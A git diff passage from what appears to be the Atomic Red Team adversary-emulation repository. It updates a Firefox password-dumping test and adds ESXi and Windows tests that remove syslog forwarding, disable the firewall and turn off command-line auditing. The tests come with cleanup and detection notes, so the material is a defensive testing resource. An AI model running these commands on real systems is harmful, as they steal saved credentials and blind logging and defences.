 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Pip must be installed.
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip -v) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+py -m venv "#{venv_path}"
+```
+##### Description: Firepwd must exist at #{Firepwd_Path}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
 ```
 ##### Description: Pycryptodome library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pycryptodome) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
 ```
 ##### Description: Pyasn1 library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pyasn1) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
 ```
 
 
diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
index 9b188497..0f8976d1 100644
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -200,13 +200,15 @@ atomic_tests:
   description: |
     Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
     Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
   supported_platforms:
   - windows
   input_arguments:
     Firepwd_Path:
       description: Filepath for Firepwd.py
       type: string
-      default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
     Out_Filepath:
       description: Filepath to output results to
       type: string
@@ -219,15 +221,12 @@ atomic_tests:
       description: Filepath to python
       type: string
       default: C:\Program Files\Python310\python.exe
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
   dependency_executor_name: powershell
   dependencies:
-  - description: |
-      Firepwd must exist at #{Firepwd_Path}
-    prereq_command: |
-      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
   - description: |
       Firefox profile directory must be present
     prereq_command: |
@@ -257,37 +256,35 @@ atomic_tests:
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Pip must be installed.
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip -v) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      py -m venv "#{venv_path}"
+  - description: |
+      Firepwd must exist at #{Firepwd_Path}
+    prereq_command: |
+      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
   - description: |
       Pycryptodome library must be installed 
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pycryptodome) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
     get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+      if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
   - description: |
       Pyasn1 library must be installed 
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pyasn1) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
     get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+      if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
   executor:
     name: powershell
     command: |
       $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-      cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+      cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
       cat #{Out_Filepath}
     cleanup_command: |
       Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue   
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index 365a35ba..1296d23a 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -28,6 +28,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi
 
 - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64)
 
+- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip)
+
 
 <br/>
 
@@ -501,4 +503,85 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - ESXi - Remove Syslog remote IP
+An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 36c62584-d360-41d6-886f-d194654be7c2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | Username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Extract line with IP address from the syslog configuration output
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+
+# Replace the IP with "0"
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+
+# Extract the IP from the line extracted from findstr
+$inputFilePath = "c:\temp\loghost.txt"
+$outputFilePath = "c:\temp\loghost_ip.txt"
+
+$fileContent = Get-Content -Path $inputFilePath -Raw
+
+if ([string]::IsNullOrWhiteSpace($fileContent)) {
+    Write-Host "The content is $fileContent"
+    Write-Host "The file is empty"
+} else {
+    # Use a regular expression to extract IP addresses
+    $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+    
+    $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+    $output | Out-File -FilePath $outputFilePath -Encoding ascii
+    
+    Write-Host "IP addresses extracted and saved to $outputFilePath"
+}
+```
+
+#### Cleanup Commands:
+```powershell
+# Re-add the initially extracted IP
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+rm c:\temp\loghost_ip.txt
+rm c:\temp\loghost.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index 348d3b6d..e8ec287c 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -315,5 +315,73 @@ atomic_tests:
     cleanup_command: 'rm -rf #{input_folder}'
     name: bash
     elevation_required: false
+- name: ESXi - Remove Syslog remote IP
+  auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+  description: |
+    An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: Username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      # Extract line with IP address from the syslog configuration output
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+      
+      # Replace the IP with "0"
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+      
+      # Extract the IP from the line extracted from findstr
+      $inputFilePath = "c:\temp\loghost.txt"
+      $outputFilePath = "c:\temp\loghost_ip.txt"
+
+      $fileContent = Get-Content -Path $inputFilePath -Raw
+
+      if ([string]::IsNullOrWhiteSpace($fileContent)) {
+          Write-Host "The content is $fileContent"
+          Write-Host "The file is empty"
+      } else {
+          # Use a regular expression to extract IP addresses
+          $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+          
+          $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+          $output | Out-File -FilePath $outputFilePath -Encoding ascii
+          
+          Write-Host "IP addresses extracted and saved to $outputFilePath"
+      }
+
+    cleanup_command: |
+      # Re-add the initially extracted IP
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+      
+      rm c:\temp\loghost_ip.txt
+      rm c:\temp\loghost.txt
+    name: powershell
+    elevation_required: true
 
   
\ No newline at end of file
diff --git a/atomics/T1560.001/src/esxi_get_loghost.txt b/atomics/T1560.001/src/esxi_get_loghost.txt
new file mode 100644
index 00000000..217d1884
--- /dev/null
+++ b/atomics/T1560.001/src/esxi_get_loghost.txt
@@ -0,0 +1 @@
+esxcli system syslog config get
\ No newline at end of file
diff --git a/atomics/T1560.001/src/esxi_remove_loghost.txt b/atomics/T1560.001/src/esxi_remove_loghost.txt
new file mode 100644
index 00000000..5ab74451
--- /dev/null
+++ b/atomics/T1560.001/src/esxi_remove_loghost.txt
@@ -0,0 +1 @@
+esxcli system syslog config set --loghost=0
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 255a8b24..61330605 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -1,4 +1,4 @@
-# T1562.003 - Impair Defenses: HISTCONTROL
+# T1562.003 - Impair Defenses: Impair Command History Logging
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003)
 <blockquote>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
 
@@ -32,6 +32,10 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te
 
 - [Atomic Test #10 - Setting the HISTIGNORE environment variable](#atomic-test-10---setting-the-histignore-environment-variable)
 
+- [Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe](#atomic-test-11---disable-windows-command-line-auditing-using-regexe)
+
+- [Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet](#atomic-test-12---disable-windows-command-line-auditing-using-powershell-cmdlet)
+
 
 <br/>
 
@@ -415,4 +419,103 @@ unset HISTIGNORE
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+  Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+echo Commencing Attack - Disabling Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+echo Commencing Cleanup - Restoring Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+  Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+echo "Commencing Attack - Disabling Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+echo "Commencing Cleanup - Restoring Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1562.003/T1562.003.yaml
index e9e15dd3..7420eb93 100644
--- a/atomics/T1562.003/T1562.003.yaml
+++ b/atomics/T1562.003/T1562.003.yaml
@@ -1,5 +1,5 @@
 attack_technique: T1562.003
-display_name: 'Impair Defenses: HISTCONTROL'
+display_name: 'Impair Defenses: Impair Command History Logging'
 atomic_tests:
 - name: Disable history collection
   auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
@@ -204,3 +204,66 @@ atomic_tests:
       # -> History cache is empty
     cleanup_command: |
       unset HISTIGNORE
+
+- name: Disable Windows Command Line Auditing using reg.exe
+  auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+  description: |
+    In Windows operating systems, command line auditing is controlled through the following registry value:
+    
+      Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+      Registry Value: ProcessCreationIncludeCmdLine_Enabled
+    
+    When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+    This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+    By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+    Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+    
+    Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+      Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+      Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+    Read more here:
+    https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+  supported_platforms:
+  - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      echo Commencing Attack - Disabling Registry Value
+      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      echo Commencing Cleanup - Restoring Registry Value
+      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+- name: Disable Windows Command Line Auditing using Powershell Cmdlet
+  auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+  description: |
+    In Windows operating systems, command line auditing is controlled through the following registry value:
+    
+      Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+      Registry Value: ProcessCreationIncludeCmdLine_Enabled
+    
+    When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+    This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+    By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+    Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+    
+    Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+      Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+      Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+    Read more here:
+    https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+    https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      echo "Commencing Attack - Disabling Registry Value"
+      New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+    cleanup_command: |
+      echo "Commencing Cleanup - Restoring Registry Value"
+      New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
+      
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index 7b148c48..4916c495 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -50,6 +50,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
 
 - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall)
 
+- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi---disable-firewall-via-esxcli)
+
 
 <br/>
 
@@ -967,4 +969,57 @@ netsh firewall set opmode mode=enable >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #23 - ESXi - Disable Firewall via Esxcli
+Adversaries may disable the ESXI firewall via ESXCLI
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bac8a340-be64-4491-a0cc-0985cb227f5a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+```
+
+#### Cleanup Commands:
+```cmd
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index 4e0e5822..a2ec688f 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -439,3 +439,42 @@ atomic_tests:
       netsh firewall set opmode mode=enable >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: ESXi - Disable Firewall via Esxcli
+  auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+  description: |
+    Adversaries may disable the ESXI firewall via ESXCLI
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+    cleanup_command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+    name: command_prompt
+    elevation_required: false
\ No newline at end of file
